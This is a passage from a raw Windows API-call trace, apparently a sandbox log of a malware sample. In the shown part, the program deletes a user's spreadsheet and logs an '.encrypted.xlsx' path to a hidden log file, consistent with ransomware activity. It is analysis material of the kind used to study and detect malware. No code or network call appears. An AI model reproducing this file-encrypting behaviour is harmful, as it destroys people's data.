hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0033.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0033.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0033.930] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0033.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0033.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0033.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0033.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0033.931] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0033.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.931] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.931] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.931] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0033.931] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.931] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.931] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.931] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.931] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.931] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.931] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.931] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.932] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0033.932] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.932] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.932] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0033.932] FreeLibrary (hLibModule=0x76e10000) returned 1 [0033.932] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.932] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.932] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.932] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx", lpFilePart=0x0) returned 0x68 [0033.932] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c03bc60, ftCreationTime.dwHighDateTime=0x1d5bcc0, ftLastAccessTime.dwLowDateTime=0xe68a5ae0, ftLastAccessTime.dwHighDateTime=0x1d5c1a1, ftLastWriteTime.dwLowDateTime=0x141b8d40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x15bf2, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="GGg2Vkusl20.xlsx", cAlternateFileName="GGG2VK~1.XLS")) returned 0x7c2240 [0033.932] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\ggg2vkusl20.xlsx")) returned 1 [0033.934] FindNextFileW (in: hFindFile=0x7c2240, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c03bc60, ftCreationTime.dwHighDateTime=0x1d5bcc0, ftLastAccessTime.dwLowDateTime=0xe68a5ae0, ftLastAccessTime.dwHighDateTime=0x1d5c1a1, ftLastWriteTime.dwLowDateTime=0x141b8d40, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x15bf2, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="GGg2Vkusl20.xlsx", cAlternateFileName="GGG2VK~1.XLS")) returned 0 [0033.934] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0033.934] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.934] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0033.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0033.934] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.935] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.935] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0033.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.935] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.935] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.935] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.935] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.935] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0033.935] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.935] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.936] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.936] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.936] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.936] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0033.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.936] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.936] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x12b5, lpOverlapped=0x0) returned 1 [0033.936] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.936] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x12b5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.936] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0033.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0033.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.encrypted.xlsx\r\n", cchWideChar=117, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 117 [0033.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x75) returned 0x7800d0 [0033.936] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.encrypted.xlsx\r\n", cchWideChar=117, lpMultiByteStr=0x7800d0, cbMultiByte=117, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\GGg2Vkusl20.encrypted.xlsx\r\n", lpUsedDefaultChar=0x0) returned 117 [0033.936] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.936] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0033.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7800d0 | out: hHeap=0x770000) returned 1 [0033.937] WriteFile (in: hFile=0x128, lpBuffer=0x7d5c40*, nNumberOfBytesToWrite=0x74, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7d5c40*, lpNumberOfBytesWritten=0x6aee3c*=0x74, lpOverlapped=0x0) returned 1 [0033.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0033.937] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0033.937] CloseHandle (hObject=0x128) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.938] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.938] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.938] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.939] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.939] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.939] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0033.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.939] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.939] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0033.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0033.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.939] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c868 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0033.940] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0033.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0033.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0033.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0033.940] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0033.940] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.940] RtlAllocateHeap 